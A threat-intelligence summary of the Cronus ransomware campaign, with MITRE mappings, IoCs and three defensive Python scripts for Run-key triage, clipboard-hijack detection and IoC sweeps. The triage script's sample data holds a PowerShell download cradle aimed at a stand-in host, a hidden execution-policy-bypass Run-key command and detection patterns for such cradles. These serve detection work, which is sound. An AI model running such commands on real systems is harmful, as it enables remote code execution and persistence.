Cronus is a ransomware campaign that uses fake PayPal receipts as its lure and is largely fileless: the final .NET payload is loaded reflectively into memory by PowerShell rather than being dropped to disk as an executable. It employs a multi-stage infection chain (malicious Word document → PowerShell loader → in-memory .NET payload) with heavy obfuscation, and combines file encryption with registry-based persistence and clipboard manipulation. #Cronus #PowerShell #NETWALKER #paypal
Keypoints
- Discovery Date: 14th July 2024
- Malicious Document: A fake receipt document named paypal_charges.doc used to initiate the attack.
- Infection Method: Spear-phishing e-mail carrying the Word document as an attachment.
- Obfuscation Techniques: The embedded VBA macro and the PowerShell stages are heavily obfuscated to evade detection.
- Ransomware Behavior: Encrypts a wide range of file types and monitors the clipboard, replacing any copied Bitcoin address so that payments are diverted.
- Persistence Mechanism: A registry Run key entry re-executes the loader at startup.
- Encryption Methods: Two AES-based routines are selected by file size: FULL_ENCRYPT for small files and TRIPLE_ENCRYPT for larger ones.
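The persistence entry and the obfuscated PowerShell loader described in the key points are what a responder would hunt for in the Run keys. The following is an added example, not code from the campaign or from the original report: it triages Run-key values for PowerShell-loader traits and decodes any -EncodedCommand argument it finds. The entries it scans are constructed for the example (the loader file name is the one from the IoC list, but the command lines around it are assumptions, not the observed ones); on a live host the same (key, name, value) triples would come from reg query or the winreg module.

```python
"""Triage Run-key values for PowerShell-loader persistence.
Added example, not Cronus code; the Run-key entries below are constructed."""
import base64
import binascii
import re

# Constructed -EncodedCommand payload (PowerShell expects base64 of UTF-16LE text).
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')".encode("utf-16-le")
).decode()

# Constructed sample of what a Run-key dump might look like. The .ps1 name is the
# one from the IoC list; the surrounding command lines are assumptions.
SAMPLE_RUN_ENTRIES = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "WinUpdate",
     r"powershell.exe -nop -w hidden -ep bypass -File C:\Users\alice\AppData\Roaming\8eef4df388f2217caec3dc26.ps1"),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "Sync",
     f"powershell -enc {ENCODED}"),
]

# Traits a responder looks for in a Run value: (label, regex). Order is kept in findings.
INDICATORS = [
    ("powershell_host", r"(?i)\b(?:powershell|pwsh)(?:\.exe)?\b"),
    ("hidden_window", r"(?i)-w(?:indowstyle)?\s+hidden"),
    ("no_profile", r"(?i)-nop(?:rofile)?\b"),
    ("exec_policy_bypass", r"(?i)-e(?:x|xecutionpolicy|p)\s+bypass"),
    ("encoded_command", r"(?i)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"),
    ("script_in_user_path", r"(?i)\\(?:AppData|Temp|Users)\\.*\.ps1\b"),
    ("download_cradle", r"(?i)\b(?:iex|invoke-expression|downloadstring|downloadfile)\b"),
]
ENCODED_ARG = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(value: str):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), else None."""
    m = ENCODED_ARG.search(value)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def triage_run_entries(entries):
    """Return one finding per suspicious entry: the indicators hit and any decoded command.
    The decoded command is searched too, so a cradle hidden behind -enc is still seen."""
    findings = []
    for key, name, value in entries:
        decoded = decode_encoded_command(value)
        haystack = value if decoded is None else value + "\n" + decoded
        hits = [label for label, pat in INDICATORS if re.search(pat, haystack)]
        # A PowerShell host on its own is not suspicious; require a second trait.
        if "powershell_host" in hits and len(hits) >= 2:
            findings.append({"key": key, "name": name, "indicators": hits, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for f in triage_run_entries(SAMPLE_RUN_ENTRIES):
        print(f"{f['key']}\\{f['name']}: {', '.join(f['indicators'])}")
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

Requiring a second trait alongside the PowerShell host keeps legitimate logon scripts out of the output. The same function can be fed entries from the RunOnce keys and the Startup folder, which T1547.001 also covers; tune INDICATORS to what is normal in your estate.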
MITRE Techniques
- [T1566.001] Phishing: Spearphishing Attachment – A malicious Word document is delivered as an e-mail attachment to initiate the attack.
- [T1204.002] User Execution: Malicious File – The victim opens the malicious document, triggering the infection.
- [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell runs the second stage of the attack.
- [T1059.005] Command and Scripting Interpreter: Visual Basic – The VBA macro embedded in the Word document is executed.
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – A registry Run key entry is created for persistence.
- [T1027.010] Obfuscated Files or Information: Command Obfuscation – The macro and PowerShell commands are obfuscated to hide the malicious code.
- [T1620] Reflective Code Loading – The ransomware payload is loaded reflectively in memory.
- [T1055.012] Process Injection: Process Hollowing – Malicious code is injected into a legitimate process.
- [T1057] Process Discovery – Running processes are enumerated so that selected ones can be terminated.
- [T1486] Data Encrypted for Impact – Files on the victim's system are encrypted.
- [T1491.001] Defacement: Internal Defacement – System settings such as the desktop wallpaper are changed as part of the attack.
- [T1565.002] Data Manipulation: Transmitted Data Manipulation – Clipboard contents are monitored and Bitcoin addresses are replaced.
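The clipboard behaviour mapped to T1565.002 above replaces a Bitcoin address the user copied with one the attacker controls. As an added example (not part of the original analysis and not Cronus code), the detector below validates candidate addresses with their real checksums (Base58Check for 1.../3... addresses, bech32/bech32m for bc1... addresses) and raises an alert when one valid address is replaced by a different valid one faster than a person would re-copy. The clipboard snapshots, the polling interval and the two-second window are constructed assumptions, and the attacker address is generated from an arbitrary hash160 rather than taken from the campaign.

```python
"""Clipper detection: a copied Bitcoin address silently replaced by a different
valid one. Added example, not Cronus code; the snapshots below are constructed."""
import hashlib
import re

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
BECH32 = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
# Candidate legacy/P2SH (1.../3...) and SegWit (bc1...) addresses; validated below.
ADDR_RE = re.compile(r"\b(?:[13][1-9A-HJ-NP-Za-km-z]{25,34}|bc1[02-9ac-hj-np-z]{11,87})\b")


def b58check_encode(payload: bytes) -> str:
    """Base58Check(version || hash160); used here only to build the sample attacker address."""
    raw = payload + hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    n, out = int.from_bytes(raw, "big"), ""
    while n:
        n, r = divmod(n, 58)
        out = B58[r] + out
    return "1" * (len(raw) - len(raw.lstrip(b"\x00"))) + out


def b58check_valid(addr: str) -> bool:
    """True if the 4-byte double-SHA256 checksum of a legacy/P2SH address verifies."""
    n = 0
    for ch in addr:
        i = B58.find(ch)
        if i < 0:
            return False
        n = n * 58 + i
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    raw = b"\x00" * (len(addr) - len(addr.lstrip("1"))) + body  # leading '1's are zero bytes
    return len(raw) == 25 and hashlib.sha256(hashlib.sha256(raw[:21]).digest()).digest()[:4] == raw[21:]


def _bech32_polymod(values):
    gen = (0x3B6A57B2, 0x26508E6D, 0x1EA119FA, 0x3D4233DD, 0x2A1462B3)
    chk = 1
    for v in values:
        top = chk >> 25
        chk = ((chk & 0x1FFFFFF) << 5) ^ v
        for i in range(5):
            chk ^= gen[i] if (top >> i) & 1 else 0
    return chk


def bech32_valid(addr: str) -> bool:
    """True if a SegWit address carries a correct bech32 (v0) or bech32m (v1+) checksum."""
    if addr not in (addr.lower(), addr.upper()):
        return False  # mixed case is invalid under BIP173
    addr = addr.lower()
    pos = addr.rfind("1")
    if pos < 1 or pos + 7 > len(addr) or len(addr) > 90 or any(c not in BECH32 for c in addr[pos + 1:]):
        return False
    hrp, data = addr[:pos], addr[pos + 1:]
    values = [ord(c) >> 5 for c in hrp] + [0] + [ord(c) & 31 for c in hrp] + [BECH32.index(c) for c in data]
    return _bech32_polymod(values) in (1, 0x2BC830A3)


def is_btc_address(addr: str) -> bool:
    return bech32_valid(addr) if addr.lower().startswith("bc1") else b58check_valid(addr)


def detect_clipper(snapshots, window=2.0):
    """snapshots: (seconds, clipboard_text) in time order. Flag one valid address being
    replaced by a different valid one within `window` seconds of first appearing: a
    user re-copying takes longer, a clipper reacts almost immediately."""
    alerts, first_seen = [], None  # first_seen = (time the address first appeared, address)
    for t, text in snapshots:
        addrs = [a for a in ADDR_RE.findall(text) if is_btc_address(a)]
        if len(addrs) != 1:
            first_seen = None
            continue
        addr = addrs[0]
        if first_seen is None or addr != first_seen[1]:
            if first_seen is not None and t - first_seen[0] <= window:
                alerts.append({"at": t, "original": first_seen[1], "replacement": addr})
            first_seen = (t, addr)
    return alerts


VICTIM_ADDR = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"          # genesis-block address (valid)
SEGWIT_ADDR = "bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4"  # BIP173 example address (valid)
ATTACKER_ADDR = b58check_encode(b"\x00" + bytes(range(1, 21)))  # constructed from an arbitrary hash160

# Constructed clipboard timeline, polled every 0.5 s while an address is in use.
SAMPLE_SNAPSHOTS = [
    (0.0, "Pay to " + VICTIM_ADDR),    # user copies the intended address
    (0.5, "Pay to " + VICTIM_ADDR),
    (1.0, "Pay to " + ATTACKER_ADDR),  # clipper swaps it a second later
    (10.0, "meeting notes"),
    (40.0, SEGWIT_ADDR),               # user copies an unrelated address much later
    (70.0, VICTIM_ADDR),               # and another one 30 s after that: normal use
]

if __name__ == "__main__":
    for a in detect_clipper(SAMPLE_SNAPSHOTS):
        print(f"t={a['at']}: {a['original']} replaced by {a['replacement']}")
```

Checksum validation matters because a clipper only swaps when the clipboard holds a real address, so a plain regex would also fire on arbitrary base58-looking strings. The time window is a heuristic: a clipper that delays its swap evades it, so on Windows pair this with the clipboard sequence number (GetClipboardSequenceNumber) or WM_CLIPBOARDUPDATE notifications to establish that the content changed without any user copy action.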
Indicators of Compromise
- [Hashes (SHA-256)] – 69b6bc4db69680118781e7a9f2580738088930fa04884755f23904fa19e638e3, 9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb – associated with paypal_charges.doc
- [File name] – paypal_charges.doc, 8eef4df388f2217caec3dc26.ps1 – used as the initial lure and second-stage loader
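To use the indicators above in a sweep, here is an added example (not from the original report) that walks a directory tree and flags files by SHA-256 and by file name. The regular expression for a 24-hex-character .ps1 name generalises the single loader name listed here and is this example's assumption, not something the report states; a hit on it is a lead to review rather than a confirmed match.

```python
"""Sweep a directory tree for the Cronus IoCs listed in the report.
Added example, not from the original report."""
import hashlib
import re
from pathlib import Path

IOC_SHA256 = {
    "69b6bc4db69680118781e7a9f2580738088930fa04884755f23904fa19e638e3",
    "9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb",
}
IOC_NAMES = {"paypal_charges.doc", "8eef4df388f2217caec3dc26.ps1"}
# Assumption: the loader name is a random 24-hex-character .ps1; generalised from one sample.
LOADER_NAME_RE = re.compile(r"^[0-9a-f]{24}\.ps1$")


def sha256_file(path: Path) -> str:
    """Stream the file through SHA-256 so large files do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep(root) -> list:
    """Return [(path, reason)] for files matching a known hash, a known name or the loader pattern.
    A file can produce two entries (name and hash) when both match."""
    hits = []
    for p in Path(root).rglob("*"):
        if not p.is_file():
            continue
        name = p.name.lower()
        if name in IOC_NAMES:
            hits.append((str(p), "ioc_filename"))
        elif LOADER_NAME_RE.match(name):
            hits.append((str(p), "loader_name_pattern"))
        if sha256_file(p) in IOC_SHA256:
            hits.append((str(p), "ioc_sha256"))
    return hits


if __name__ == "__main__":
    import sys
    for path, reason in sweep(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{reason}: {path}")
```

Name matches are weak evidence on their own (the lure name is trivially changed); the hash matches are the ones worth escalating, and any file caught by the loader pattern should be read for the traits described under persistence before it is treated as a match.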